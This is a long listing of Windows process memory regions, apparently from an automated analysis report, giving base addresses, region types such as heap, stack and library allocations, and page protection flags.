|
page read and write
|
||
281AC910000
|
direct allocation
|
page read and write
|
||
1F23D1C0000
|
heap
|
page read and write
|
||
1FCD6330000
|
heap
|
page read and write
|
||
281AB820000
|
direct allocation
|
page read and write
|
||
DF5000
|
heap
|
page read and write
|
||
CBC000
|
heap
|
page read and write
|
||
1DFEFC2F000
|
heap
|
page read and write
|
||
1FCD67C0000
|
heap
|
page read and write
|
||
7FF6448B4000
|
unkown
|
page readonly
|
||
281ABE1C000
|
heap
|
page read and write
|
||
281ACBF3000
|
heap
|
page read and write
|
||
1C098C68000
|
heap
|
page read and write
|
||
1D37210F000
|
heap
|
page read and write
|
||
174F1941000
|
heap
|
page read and write
|
||
7FFE13200000
|
unkown
|
page readonly
|
||
246473A2000
|
heap
|
page read and write
|
||
1FCD61C6000
|
heap
|
page read and write
|
||
19525FF5000
|
heap
|
page read and write
|
||
24647063000
|
heap
|
page read and write
|
||
1BCBE000
|
stack
|
page read and write
|
||
281AB6CE000
|
heap
|
page read and write
|
||
7FFD9AC10000
|
trusted library allocation
|
page read and write
|
||
174F199C000
|
heap
|
page read and write
|
||
23699E20000
|
heap
|
page read and write
|
||
19525FDD000
|
heap
|
page read and write
|
||
829857F000
|
stack
|
page read and write
|
||
A7F4FE000
|
stack
|
page read and write
|
||
2646BB34000
|
heap
|
page read and write
|
||
281ABE7E000
|
heap
|
page read and write
|
||
281ACBF1000
|
heap
|
page read and write
|
||
1F2252AE000
|
trusted library allocation
|
page read and write
|
||
1DC5D0B0000
|
heap
|
page read and write
|
||
281ABF76000
|
heap
|
page read and write
|
||
281AC04F000
|
heap
|
page read and write
|
||
23BCD008000
|
heap
|
page read and write
|
||
26469B25000
|
heap
|
page read and write
|
||
1DA818A1000
|
heap
|
page read and write
|
||
27E0000
|
heap
|
page read and write
|
||
17D13E14000
|
heap
|
page read and write
|
||
1DFEFC0A000
|
heap
|
page read and write
|
||
16CF0B04000
|
heap
|
page read and write
|
||
2646BB20000
|
heap
|
page read and write
|
||
25B4F0E0000
|
heap
|
page read and write
|
||
281ACDCD000
|
heap
|
page read and write
|
||
1CF00000
|
heap
|
page read and write
|
||
281AB662000
|
heap
|
page read and write
|
||
7FFD9A95A000
|
trusted library allocation
|
page read and write
|
||
A1CDEFF000
|
unkown
|
page read and write
|
||
15F0000
|
heap
|
page read and write
|
||
281ABF38000
|
heap
|
page read and write
|
||
281ACBB2000
|
heap
|
page read and write
|
||
1B3F6A5B000
|
heap
|
page read and write
|
||
23E90A20000
|
heap
|
page read and write
|
||
195247D0000
|
heap
|
page read and write
|
||
281AC9CC000
|
heap
|
page read and write
|
||
281AC9D5000
|
heap
|
page read and write
|
||
1C099244000
|
heap
|
page read and write
|
||
2224ED10000
|
trusted library allocation
|
page read and write
|
||
1FCD632E000
|
heap
|
page read and write
|
||
7FFD9AB20000
|
trusted library allocation
|
page read and write
|
||
C8A60FF000
|
stack
|
page read and write
|
||
264FC1A0000
|
heap
|
page read and write
|
||
281AB9DB000
|
heap
|
page read and write
|
||
1DFEFC4D000
|
heap
|
page read and write
|
||
2262DA21000
|
heap
|
page read and write
|
||
829867E000
|
stack
|
page read and write
|
||
281AC9DA000
|
heap
|
page read and write
|
||
174F0EF9000
|
trusted library allocation
|
page read and write
|
||
E50000
|
heap
|
page read and write
|
||
1DFEFC0B000
|
heap
|
page read and write
|
||
2224EDF0000
|
trusted library allocation
|
page read and write
|
||
2ECE000
|
stack
|
page read and write
|
||
1BAF0000
|
heap
|
page read and write
|
||
23BCC8F6000
|
heap
|
page read and write
|
||
16CEEEEA000
|
heap
|
page read and write
|
||
2224F010000
|
trusted library allocation
|
page read and write
|
||
7FFD9AA00000
|
trusted library allocation
|
page read and write
|
||
7FFD9A970000
|
trusted library allocation
|
page execute and read and write
|
||
1670000
|
heap
|
page read and write
|
||
174F1996000
|
heap
|
page read and write
|
||
16CEEEC9000
|
heap
|
page read and write
|
||
13B9000
|
heap
|
page read and write
|
||
23BCC915000
|
heap
|
page read and write
|
||
281ABF64000
|
heap
|
page read and write
|
||
281ABF13000
|
heap
|
page read and write
|
||
7FFE13397000
|
unkown
|
page execute and write copy
|
||
281AB6B7000
|
heap
|
page read and write
|
||
7FFDFB04B000
|
unkown
|
page execute and write copy
|
||
19522E60000
|
heap
|
page readonly
|
||
1D0CD014000
|
heap
|
page read and write
|
||
1F8B26E4000
|
heap
|
page read and write
|
||
23BCC8F5000
|
heap
|
page read and write
|
||
281AB9DD000
|
heap
|
page read and write
|
||
2074DB08000
|
heap
|
page read and write
|
||
F90000
|
trusted library allocation
|
page read and write
|
||
1C098C4B000
|
heap
|
page read and write
|
||
A977BE6000
|
stack
|
page read and write
|
||
23BCC8B0000
|
trusted library allocation
|
page read and write
|
||
7FFE13393000
|
unkown
|
page execute and read and write
|
||
19525F88000
|
heap
|
page read and write
|
||
281AC9AF000
|
heap
|
page read and write
|
||
174F198E000
|
heap
|
page read and write
|
||
23BCD01F000
|
heap
|
page read and write
|
||
19525FF5000
|
heap
|
page read and write
|
||
29E031F4000
|
heap
|
page read and write
|
||
281ACB4F000
|
heap
|
page read and write
|
||
7FFE0EBFD000
|
unkown
|
page execute and read and write
|
||
1D37211C000
|
heap
|
page read and write
|
||
2224EE00000
|
heap
|
page read and write
|
||
D11000
|
stack
|
page read and write
|
||
21B78EC0000
|
trusted library allocation
|
page read and write
|
||
281AC033000
|
heap
|
page read and write
|
||
281ABEDC000
|
heap
|
page read and write
|
||
1B8AC230000
|
heap
|
page read and write
|
||
1F224E40000
|
trusted library allocation
|
page read and write
|
||
281AC9CC000
|
heap
|
page read and write
|
||
281ACB27000
|
heap
|
page read and write
|
||
281ABA3C000
|
heap
|
page read and write
|
||
1DFF3190000
|
direct allocation
|
page read and write
|
||
281AC970000
|
direct allocation
|
page read and write
|
||
2F7FF7E000
|
unkown
|
page readonly
|
||
281ABA66000
|
heap
|
page read and write
|
||
281AC48C000
|
direct allocation
|
page read and write
|
||
281AC8B0000
|
direct allocation
|
page read and write
|
||
1BFD0420000
|
heap
|
page read and write
|
||
7FFD9A7B3000
|
trusted library allocation
|
page execute and read and write
|
||
2F01E7E000
|
unkown
|
page readonly
|
||
19524640000
|
heap
|
page read and write
|
||
2538CA41000
|
heap
|
page read and write
|
||
2224A002000
|
heap
|
page read and write
|
||
1BE4F000
|
stack
|
page read and write
|
||
23BCCAB0000
|
heap
|
page read and write
|
||
23BCC8C7000
|
heap
|
page read and write
|
||
BB1000
|
stack
|
page read and write
|
||
2DDB4E7A000
|
heap
|
page read and write
|
||
2FDF000
|
stack
|
page read and write
|
||
281AB6D9000
|
heap
|
page read and write
|
||
1E8FFE4D000
|
heap
|
page read and write
|
||
16CEEEDD000
|
heap
|
page read and write
|
||
281ACB6D000
|
heap
|
page read and write
|
||
281AB6C8000
|
heap
|
page read and write
|
||
215476F8000
|
heap
|
page read and write
|
||
26469B2D000
|
heap
|
page read and write
|
||
23BCD033000
|
heap
|
page read and write
|
||
7FFD9A7B4000
|
trusted library allocation
|
page read and write
|
||
26469B2A000
|
heap
|
page read and write
|
||
22216360000
|
heap
|
page read and write
|
||
281ACBC9000
|
heap
|
page read and write
|
||
12A5E0CC000
|
heap
|
page read and write
|
||
2463EB07000
|
trusted library allocation
|
page read and write
|
||
2074DD75000
|
heap
|
page read and write
|
||
1195000
|
heap
|
page read and write
|
||
1C098C42000
|
heap
|
page read and write
|
||
281ABF2E000
|
heap
|
page read and write
|
||
22249894000
|
heap
|
page read and write
|
||
16CEEECD000
|
heap
|
page read and write
|
||
236710E0000
|
heap
|
page read and write
|
||
24647190000
|
heap
|
page read and write
|
||
2224F050000
|
trusted library allocation
|
page read and write
|
||
13D7000
|
heap
|
page read and write
|
||
EC45DFC000
|
stack
|
page read and write
|
||
281AC9C0000
|
heap
|
page read and write
|
||
281AC8D0000
|
direct allocation
|
page read and write
|
||
83471FF000
|
stack
|
page read and write
|
||
281AB619000
|
heap
|
page read and write
|
||
281ABF64000
|
heap
|
page read and write
|
||
7FFD9A970000
|
trusted library allocation
|
page read and write
|
||
174F1B3C000
|
heap
|
page read and write
|
||
281AB630000
|
heap
|
page read and write
|
||
281ACA1E000
|
heap
|
page read and write
|
||
19525F88000
|
heap
|
page read and write
|
||
422390C000
|
stack
|
page read and write
|
||
26469B38000
|
heap
|
page read and write
|
||
3190000
|
heap
|
page read and write
|
||
2646BB2D000
|
heap
|
page read and write
|
||
15E84B00000
|
heap
|
page read and write
|
||
23671125000
|
heap
|
page read and write
|
||
25B4F181000
|
heap
|
page read and write
|
||
53C93FF000
|
stack
|
page read and write
|
||
1412F741000
|
heap
|
page read and write
|
||
14CC0631000
|
heap
|
page read and write
|
||
19525FED000
|
heap
|
page read and write
|
||
2646BB36000
|
heap
|
page read and write
|
||
24647068000
|
heap
|
page read and write
|
||
2FF1000
|
trusted library allocation
|
page read and write
|
||
174F1A3C000
|
trusted library allocation
|
page read and write
|
||
21B78F97000
|
heap
|
page read and write
|
||
22250000000
|
heap
|
page read and write
|
||
26469C20000
|
trusted library allocation
|
page read and write
|
||
1B3F6A71000
|
heap
|
page read and write
|
||
281ACDDD000
|
heap
|
page read and write
|
||
7FFD9ABA0000
|
trusted library allocation
|
page read and write
|
||
281AC220000
|
direct allocation
|
page read and write
|
||
BA032F6000
|
stack
|
page read and write
|
||
160026A0000
|
heap
|
page read and write
|
||
281AC099000
|
heap
|
page read and write
|
||
1FCD6184000
|
heap
|
page read and write
|
||
211E3080000
|
heap
|
page read and write
|
||
281ABF5C000
|
heap
|
page read and write
|
||
281AC9E1000
|
heap
|
page read and write
|
||
7FFE11EC0000
|
unkown
|
page readonly
|
||
23BCC8FF000
|
heap
|
page read and write
|
||
281AC03E000
|
heap
|
page read and write
|
||
222498FF000
|
heap
|
page read and write
|
||
16CEEF74000
|
heap
|
page read and write
|
||
2224ED00000
|
trusted library allocation
|
page read and write
|
||
1CC34E40000
|
heap
|
page read and write
|
||
1130000
|
heap
|
page read and write
|
||
2262DA11000
|
heap
|
page read and write
|
||
119D000
|
heap
|
page read and write
|
||
281AB6BF000
|
heap
|
page read and write
|
||
281AC9DC000
|
heap
|
page read and write
|
||
281AC9F1000
|
heap
|
page read and write
|
||
1DFEFC2B000
|
heap
|
page read and write
|
||
19522C99000
|
heap
|
page read and write
|
||
24646A90000
|
trusted library allocation
|
page read and write
|
||
1DFEFD7B000
|
direct allocation
|
page read and write
|
||
13CF000
|
heap
|
page read and write
|
||
26469AB5000
|
heap
|
page read and write
|
||
16CEEF70000
|
heap
|
page read and write
|
||
1B8AC2A1000
|
heap
|
page read and write
|
||
281AB4D4000
|
heap
|
page read and write
|
||
26469AB2000
|
heap
|
page read and write
|
||
281AC9D1000
|
heap
|
page read and write
|
||
281AC10E000
|
heap
|
page read and write
|
||
21B79515000
|
heap
|
page read and write
|
||
2155A7DA000
|
heap
|
page read and write
|
||
1D6BD01D000
|
heap
|
page read and write
|
||
195247CE000
|
heap
|
page read and write
|
||
1F223123000
|
heap
|
page read and write
|
||
281AC548000
|
direct allocation
|
page read and write
|
||
2074DA60000
|
heap
|
page read and write
|
||
1F8B26A0000
|
heap
|
page read and write
|
||
12BD8000
|
trusted library allocation
|
page read and write
|
||
160026E1000
|
heap
|
page read and write
|
||
16CEEF23000
|
heap
|
page read and write
|
||
1F2233B0000
|
heap
|
page read and write
|
||
281ABF09000
|
heap
|
page read and write
|
||
2646A29F000
|
heap
|
page read and write
|
||
281A9CCA000
|
heap
|
page read and write
|
||
2646A294000
|
heap
|
page read and write
|
||
10F1000
|
stack
|
page read and write
|
||
1EC765F4000
|
heap
|
page read and write
|
||
2155A7C0000
|
heap
|
page read and write
|
||
7FFE130C9000
|
unkown
|
page execute and read and write
|
||
CE6000
|
heap
|
page read and write
|
||
281AC098000
|
heap
|
page read and write
|
||
281AC033000
|
heap
|
page read and write
|
||
281AC980000
|
direct allocation
|
page read and write
|
||
7FFDF8607000
|
unkown
|
page execute and read and write
|
||
1E835A2B000
|
heap
|
page read and write
|
||
281ACA0A000
|
heap
|
page read and write
|
||
174F1B38000
|
heap
|
page read and write
|
||
2A04CF71000
|
heap
|
page read and write
|
||
27A14FC000
|
stack
|
page read and write
|
||
3C0000
|
heap
|
page read and write
|
||
D3067E000
|
stack
|
page read and write
|
||
7FFD9A8F0000
|
trusted library allocation
|
page execute and read and write
|
||
7DF4C1480000
|
trusted library allocation
|
page execute and read and write
|
||
281ABE51000
|
heap
|
page read and write
|
||
281AB6D0000
|
heap
|
page read and write
|
||
7FFE0EBD1000
|
unkown
|
page execute and read and write
|
||
281ABF13000
|
heap
|
page read and write
|
||
21B78F5B000
|
heap
|
page read and write
|
||
281AC8C0000
|
direct allocation
|
page read and write
|
||
281AB630000
|
heap
|
page read and write
|
||
16CEEF33000
|
heap
|
page read and write
|
||
D50000
|
heap
|
page read and write
|
||
281ABB0D000
|
heap
|
page read and write
|
||
222498B6000
|
heap
|
page read and write
|
||
281AC0BC000
|
heap
|
page read and write
|
||
2646A13A000
|
heap
|
page read and write
|
||
16CEEEA7000
|
heap
|
page read and write
|
||
21253445000
|
heap
|
page read and write
|
||
29E02F00000
|
heap
|
page read and write
|
||
23BCC91D000
|
heap
|
page read and write
|
||
1BC00000
|
heap
|
page execute and read and write
|
||
7FFD9A7CD000
|
trusted library allocation
|
page execute and read and write
|
||
281ABF48000
|
heap
|
page read and write
|
||
22249917000
|
heap
|
page read and write
|
||
19525F82000
|
heap
|
page read and write
|
||
21B794E7000
|
heap
|
page read and write
|
||
22249720000
|
heap
|
page read and write
|
||
1CA95240000
|
heap
|
page read and write
|
||
2224A11A000
|
heap
|
page read and write
|
||
2462D090000
|
heap
|
page read and write
|
||
281AB6C8000
|
heap
|
page read and write
|
||
174F197B000
|
heap
|
page read and write
|
||
7E5000
|
heap
|
page read and write
|
||
70EA2BE000
|
stack
|
page read and write
|
||
281ABF23000
|
heap
|
page read and write
|
||
281AC9CE000
|
heap
|
page read and write
|
||
281AB659000
|
heap
|
page read and write
|
||
23671104000
|
heap
|
page read and write
|
||
195247C6000
|
heap
|
page read and write
|
||
17D13C30000
|
heap
|
page read and write
|
||
7FFD9A8E0000
|
trusted library allocation
|
page execute and read and write
|
||
2074DA70000
|
heap
|
page read and write
|
||
23BCD02B000
|
heap
|
page read and write
|
||
70E9FFF000
|
stack
|
page read and write
|
||
21253209000
|
heap
|
page read and write
|
||
21B78F94000
|
heap
|
page read and write
|
||
1B5DC000
|
stack
|
page read and write
|
||
7FFD9A9B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A7D1000
|
trusted library allocation
|
page read and write
|
||
1D0CCCF0000
|
heap
|
page read and write
|
||
7FF71F100000
|
unkown
|
page readonly
|
||
1BF35000
|
heap
|
page read and write
|
||
BA0347E000
|
stack
|
page read and write
|
||
1DFEFC4D000
|
heap
|
page read and write
|
||
1FCD6323000
|
heap
|
page read and write
|
||
1BF1B000
|
heap
|
page read and write
|
||
281ABFBF000
|
heap
|
page read and write
|
||
281ABFBF000
|
heap
|
page read and write
|
||
31AF000
|
trusted library allocation
|
page read and write
|
||
1B3F6A71000
|
heap
|
page read and write
|
||
281ABF60000
|
heap
|
page read and write
|
||
2224A104000
|
heap
|
page read and write
|
||
1DA81A70000
|
heap
|
page read and write
|
||
281ABF76000
|
heap
|
page read and write
|
||
1FCD6142000
|
heap
|
page read and write
|
||
281AC9D5000
|
heap
|
page read and write
|
||
7FFD9A7D4000
|
trusted library allocation
|
page read and write
|
||
281AC04B000
|
heap
|
page read and write
|
||
174F1A3B000
|
trusted library allocation
|
page read and write
|
||
2369A134000
|
heap
|
page read and write
|
||
131A3000
|
trusted library allocation
|
page read and write
|
||
7FFD9A8E0000
|
trusted library allocation
|
page execute and read and write
|
||
281ABE0A000
|
heap
|
page read and write
|
||
B40000
|
trusted library allocation
|
page read and write
|
||
281AC9CE000
|
heap
|
page read and write
|
||
7FFE0EC00000
|
unkown
|
page execute and write copy
|
||
FC0000
|
heap
|
page read and write
|
||
174F1A32000
|
trusted library allocation
|
page read and write
|
||
C5C9AFF000
|
stack
|
page read and write
|
||
D198D7F000
|
stack
|
page read and write
|
||
174F1A2E000
|
trusted library allocation
|
page read and write
|
||
7FFD9A7EC000
|
trusted library allocation
|
page execute and read and write
|
||
16CEEE00000
|
heap
|
page read and write
|
||
2F001FE000
|
unkown
|
page readonly
|
||
26469B33000
|
heap
|
page read and write
|
||
2462D0D2000
|
heap
|
page read and write
|
||
23BCCB12000
|
heap
|
page read and write
|
||
281ABF4C000
|
heap
|
page read and write
|
||
264FC120000
|
heap
|
page read and write
|
||
1F225D65000
|
trusted library allocation
|
page read and write
|
||
264FC1FD000
|
heap
|
page read and write
|
||
1AF8F000
|
stack
|
page read and write
|
||
131C000
|
heap
|
page read and write
|
||
7FFE0EBF9000
|
unkown
|
page execute and read and write
|
||
16CEEF2E000
|
heap
|
page read and write
|
||
21B78F9F000
|
heap
|
page read and write
|
||
281AB9CC000
|
heap
|
page read and write
|
||
2A1301D0000
|
heap
|
page read and write
|
||
2646A291000
|
heap
|
page read and write
|
||
1BA70000
|
heap
|
page execute and read and write
|
||
1FCD67E9000
|
heap
|
page read and write
|
||
21B78FB4000
|
heap
|
page read and write
|
||
2EDDBF6000
|
stack
|
page read and write
|
||
1FCD816E000
|
heap
|
page read and write
|
||
21253444000
|
heap
|
page read and write
|
||
9E0000
|
heap
|
page read and write
|
||
19525FE5000
|
heap
|
page read and write
|
||
2224EDF0000
|
trusted library allocation
|
page read and write
|
||
16CEF1A6000
|
heap
|
page read and write
|
||
1620000
|
heap
|
page read and write
|
||
281AB66A000
|
heap
|
page read and write
|
||
281AC9A3000
|
heap
|
page read and write
|
||
7FFD9A866000
|
trusted library allocation
|
page read and write
|
||
19522CBD000
|
heap
|
page read and write
|
||
281AB6C0000
|
heap
|
page read and write
|
||
174F193B000
|
heap
|
page read and write
|
||
19522D6B000
|
heap
|
page read and write
|
||
7FF64489B000
|
unkown
|
page readonly
|
||
1C098BD4000
|
heap
|
page read and write
|
||
281ACD93000
|
heap
|
page read and write
|
||
21B7ADF4000
|
heap
|
page read and write
|
||
2462EA91000
|
trusted library allocation
|
page read and write
|
||
281AD5B0000
|
direct allocation
|
page read and write
|
||
1F23CE9B000
|
heap
|
page read and write
|
||
FE755FE000
|
stack
|
page read and write
|
||
16CEEF70000
|
heap
|
page read and write
|
||
1DA81840000
|
heap
|
page read and write
|
||
1E835D80000
|
heap
|
page read and write
|
||
2369A130000
|
heap
|
page read and write
|
||
751000
|
heap
|
page read and write
|
||
25B4F0E4000
|
heap
|
page read and write
|
||
281AB6BF000
|
heap
|
page read and write
|
||
281ABA0E000
|
heap
|
page read and write
|
||
2463EAC1000
|
trusted library allocation
|
page read and write
|
||
19525F8C000
|
heap
|
page read and write
|
||
1C099205000
|
heap
|
page read and write
|
||
7FFD9AB10000
|
trusted library allocation
|
page read and write
|
||
281AC9CA000
|
heap
|
page read and write
|
||
281ABF5C000
|
heap
|
page read and write
|
||
1C09921E000
|
heap
|
page read and write
|
||
BA035FE000
|
stack
|
page read and write
|
||
281ACB6D000
|
heap
|
page read and write
|
||
281AC9C6000
|
heap
|
page read and write
|
||
1CC34CC0000
|
heap
|
page read and write
|
||
1F2230C0000
|
heap
|
page read and write
|
||
281ABF5C000
|
heap
|
page read and write
|
||
281ACBF5000
|
heap
|
page read and write
|
||
281AC99D000
|
heap
|
page read and write
|
||
7FF644870000
|
unkown
|
page readonly
|
||
1C523000
|
heap
|
page read and write
|
||
8298478000
|
stack
|
page read and write
|
||
281AC9E1000
|
heap
|
page read and write
|
||
12A5E39A000
|
heap
|
page read and write
|
||
2462EA20000
|
heap
|
page read and write
|
||
281ACB68000
|
heap
|
page read and write
|
||
1EC76618000
|
heap
|
page read and write
|
||
1DFEFD20000
|
direct allocation
|
page read and write
|
||
281AC0BE000
|
heap
|
page read and write
|
||
281AC950000
|
direct allocation
|
page read and write
|
||
174F193A000
|
heap
|
page read and write
|
||
1FCD6182000
|
heap
|
page read and write
|
||
23BCCAD0000
|
trusted library allocation
|
page read and write
|
||
281AB6BF000
|
heap
|
page read and write
|
||
281ABF60000
|
heap
|
page read and write
|
||
7FFD9A9E0000
|
trusted library allocation
|
page read and write
|
||
281ABF3D000
|
heap
|
page read and write
|
||
281ABF60000
|
heap
|
page read and write
|
||
281ACA05000
|
heap
|
page read and write
|
||
281AC11A000
|
heap
|
page read and write
|
||
16CEEF33000
|
heap
|
page read and write
|
||
A7F0FE000
|
stack
|
page read and write
|
||
7FFD9A7B0000
|
trusted library allocation
|
page read and write
|
||
7FFE0EC02000
|
unkown
|
page read and write
|
||
7FFE148C1000
|
unkown
|
page execute read
|
||
7FFDFA9A0000
|
unkown
|
page readonly
|
||
1BFD0430000
|
heap
|
page read and write
|
||
115C000
|
heap
|
page read and write
|
||
23699F41000
|
heap
|
page read and write
|
||
174F19B3000
|
heap
|
page read and write
|
||
281AC9E1000
|
heap
|
page read and write
|
||
23699FBA000
|
heap
|
page read and write
|
||
23BCCAF0000
|
heap
|
page read and write
|
||
281AB6A1000
|
heap
|
page read and write
|
||
281AB6D6000
|
heap
|
page read and write
|
||
7FFDFB546000
|
unkown
|
page execute and read and write
|
||
20354EA0000
|
heap
|
page read and write
|
||
1DFF1560000
|
heap
|
page read and write
|
||
1F2267FC000
|
trusted library allocation
|
page read and write
|
||
174F199C000
|
heap
|
page read and write
|
||
1F23D3F0000
|
heap
|
page read and write
|
||
281ACB48000
|
heap
|
page read and write
|
||
2646BB34000
|
heap
|
page read and write
|
||
281AC090000
|
heap
|
page read and write
|
||
3050000
|
heap
|
page execute and read and write
|
||
246472A7000
|
heap
|
page read and write
|
||
7FFD9AB40000
|
trusted library allocation
|
page read and write
|
||
7FFE13201000
|
unkown
|
page execute and read and write
|
||
281AB619000
|
heap
|
page read and write
|
||
2646A2B2000
|
heap
|
page read and write
|
||
26469A30000
|
trusted library allocation
|
page read and write
|
||
174F1B33000
|
heap
|
page read and write
|
||
5CA4BEC000
|
stack
|
page read and write
|
||
7FFD9AB93000
|
trusted library allocation
|
page read and write
|
||
2224EEF2000
|
heap
|
page read and write
|
||
73B000
|
heap
|
page read and write
|
||
174F1996000
|
heap
|
page read and write
|
||
281ABFBF000
|
heap
|
page read and write
|
||
281ABF5C000
|
heap
|
page read and write
|
||
50D2AFC000
|
stack
|
page read and write
|
||
1B62D000
|
stack
|
page read and write
|
||
1DFEFC81000
|
heap
|
page read and write
|
||
1F2233BD000
|
heap
|
page read and write
|
||
174F198E000
|
heap
|
page read and write
|
||
19522D68000
|
heap
|
page read and write
|
||
1F226496000
|
trusted library allocation
|
page read and write
|
||
BA0307A000
|
stack
|
page read and write
|
||
19525F71000
|
heap
|
page read and write
|
||
1BB6E000
|
stack
|
page read and write
|
||
1F23D140000
|
heap
|
page read and write
|
||
23BCD039000
|
heap
|
page read and write
|
||
26469A63000
|
heap
|
page read and write
|
||
7FFD9A793000
|
trusted library allocation
|
page execute and read and write
|
||
281AB6C8000
|
heap
|
page read and write
|
||
281AC9C6000
|
heap
|
page read and write
|
||
2FEC000
|
trusted library allocation
|
page read and write
|
||
7FFD9A972000
|
trusted library allocation
|
page read and write
|
||
23BCC8FF000
|
heap
|
page read and write
|
||
2224EEF1000
|
heap
|
page read and write
|
||
281AB67B000
|
heap
|
page read and write
|
||
7FF71F118000
|
unkown
|
page read and write
|
||
19524B5C000
|
heap
|
page read and write
|
||
2224EE83000
|
heap
|
page read and write
|
||
281AC9A5000
|
heap
|
page read and write
|
||
2538CA2B000
|
heap
|
page read and write
|
||
215476EB000
|
heap
|
page read and write
|
||
1BEF3000
|
heap
|
page read and write
|
||
D3039F000
|
stack
|
page read and write
|
||
16CEEF1C000
|
heap
|
page read and write
|
||
7FFE1A450000
|
unkown
|
page readonly
|
||
26469B2C000
|
heap
|
page read and write
|
||
25B4F160000
|
heap
|
page read and write
|
||
19522C78000
|
heap
|
page read and write
|
||
1B80F000
|
stack
|
page read and write
|
||
E8C8B7E000
|
stack
|
page read and write
|
||
2462D0E6000
|
heap
|
page read and write
|
||
1C098C61000
|
heap
|
page read and write
|
||
1DFF31B1000
|
direct allocation
|
page read and write
|
||
281ACB27000
|
heap
|
page read and write
|
||
1DFEFC0D000
|
heap
|
page read and write
|
||
281AC9BC000
|
heap
|
page read and write
|
||
174F1A2E000
|
trusted library allocation
|
page read and write
|
||
281AB60C000
|
heap
|
page read and write
|
||
7FFD9A7BD000
|
trusted library allocation
|
page execute and read and write
|
||
1D37210F000
|
heap
|
page read and write
|
||
1C099224000
|
heap
|
page read and write
|
||
1B160000
|
heap
|
page read and write
|
||
1DFF323D000
|
direct allocation
|
page read and write
|
||
306F000
|
trusted library allocation
|
page read and write
|
||
12A5E0D9000
|
heap
|
page read and write
|
||
281AC9EE000
|
heap
|
page read and write
|
||
1FCD61D7000
|
heap
|
page read and write
|
||
2F006FB000
|
stack
|
page read and write
|
||
281AC0C6000
|
heap
|
page read and write
|
||
47B9CFB000
|
stack
|
page read and write
|
||
23F47520000
|
heap
|
page read and write
|
||
23F47587000
|
heap
|
page read and write
|
||
FE754FF000
|
stack
|
page read and write
|
||
174F1A3A000
|
trusted library allocation
|
page read and write
|
||
29AC000
|
trusted library allocation
|
page read and write
|
||
2EDDFFF000
|
stack
|
page read and write
|
||
BA03279000
|
stack
|
page read and write
|
||
1C098C07000
|
heap
|
page read and write
|
||
281ABA1C000
|
heap
|
page read and write
|
||
2462D148000
|
heap
|
page read and write
|
||
1D0CD020000
|
heap
|
page read and write
|
||
1D6BCFA0000
|
heap
|
page read and write
|
||
26469ADF000
|
heap
|
page read and write
|
||
1C098B30000
|
trusted library allocation
|
page read and write
|
||
53C8FCC000
|
stack
|
page read and write
|
||
1C098C50000
|
heap
|
page read and write
|
||
1B8AC2A1000
|
heap
|
page read and write
|
||
281ACBF4000
|
heap
|
page read and write
|
||
1F8B2731000
|
heap
|
page read and write
|
||
211E2F91000
|
heap
|
page read and write
|
||
16CEEF74000
|
heap
|
page read and write
|
||
1B59E000
|
stack
|
page read and write
|
||
FC6000
|
heap
|
page read and write
|
||
65A9D7E000
|
stack
|
page read and write
|
||
7FFD9A7B0000
|
trusted library allocation
|
page read and write
|
||
7FFE0EC6A000
|
unkown
|
page execute and write copy
|
||
2224A820000
|
trusted library allocation
|
page read and write
|
||
1FCD61A5000
|
heap
|
page read and write
|
||
1EC76450000
|
heap
|
page read and write
|
||
1B8AC235000
|
heap
|
page read and write
|
||
1FCD67DC000
|
heap
|
page read and write
|
||
24630386000
|
trusted library allocation
|
page read and write
|
||
23BCC913000
|
heap
|
page read and write
|
||
16CEEF72000
|
heap
|
page read and write
|
||
1CC34E61000
|
heap
|
page read and write
|
||
281AC9AD000
|
heap
|
page read and write
|
||
C00000
|
trusted library allocation
|
page read and write
|
||
2224F107000
|
trusted library allocation
|
page read and write
|
||
1C84B000
|
stack
|
page read and write
|
||
281AB697000
|
heap
|
page read and write
|
||
16CEEF64000
|
heap
|
page read and write
|
||
281AC0BE000
|
heap
|
page read and write
|
||
281AC960000
|
direct allocation
|
page read and write
|
||
2684AF04000
|
heap
|
page read and write
|
||
281ACEF4000
|
heap
|
page read and write
|
||
7FFD9A80C000
|
trusted library allocation
|
page execute and read and write
|
||
2646BB23000
|
heap
|
page read and write
|
||
281AC0C6000
|
heap
|
page read and write
|
||
1DFEFC6C000
|
heap
|
page read and write
|
||
BFA91FE000
|
unkown
|
page read and write
|
||
21B7ADF4000
|
heap
|
page read and write
|
||
7FFD9A7DB000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9AAF0000
|
trusted library allocation
|
page read and write
|
||
281AC9D5000
|
heap
|
page read and write
|
||
1AFD3000
|
heap
|
page read and write
|
||
1AF90000
|
heap
|
page execute and read and write
|
||
174F1A31000
|
trusted library allocation
|
page read and write
|
||
174F19CE000
|
heap
|
page read and write
|
||
2F003FE000
|
unkown
|
page readonly
|
||
1C09AB86000
|
heap
|
page read and write
|
||
281AC9AB000
|
heap
|
page read and write
|
||
281ABF24000
|
heap
|
page read and write
|
||
281ABA3C000
|
heap
|
page read and write
|
||
19525F95000
|
heap
|
page read and write
|
||
2A1302A9000
|
heap
|
page read and write
|
||
29E02F68000
|
heap
|
page read and write
|
||
21B794F2000
|
heap
|
page read and write
|
||
281ABF3F000
|
heap
|
page read and write
|
||
281ABA5E000
|
heap
|
page read and write
|
||
21B79512000
|
heap
|
page read and write
|
||
31AC000
|
trusted library allocation
|
page read and write
|
||
281ABA6D000
|
heap
|
page read and write
|
||
1F234F0D000
|
trusted library allocation
|
page read and write
|
||
174F194A000
|
heap
|
page read and write
|
||
7FFD9A82C000
|
trusted library allocation
|
page execute and read and write
|
||
1C099239000
|
heap
|
page read and write
|
||
1412F72B000
|
heap
|
page read and write
|
||
7FFD9A7B4000
|
trusted library allocation
|
page read and write
|
||
23E907AA000
|
heap
|
page read and write
|
||
2EDDDFF000
|
stack
|
page read and write
|
||
2224F0F1000
|
trusted library allocation
|
page read and write
|
||
280FEFF000
|
unkown
|
page read and write
|
||
2224A015000
|
heap
|
page read and write
|
||
25B4F179000
|
heap
|
page read and write
|
||
281ACA05000
|
heap
|
page read and write
|
||
7FFDFAA37000
|
unkown
|
page execute and read and write
|
||
1CA952B2000
|
heap
|
page read and write
|
||
AB6B55C000
|
stack
|
page read and write
|
||
70EAF8D000
|
stack
|
page read and write
|
||
281AC11E000
|
heap
|
page read and write
|
||
1DFEFC63000
|
heap
|
page read and write
|
||
1D3722C0000
|
heap
|
page read and write
|
||
26469ABE000
|
heap
|
page read and write
|
||
281ACBB0000
|
heap
|
page read and write
|
||
281ABF52000
|
heap
|
page read and write
|
||
281AC544000
|
direct allocation
|
page read and write
|
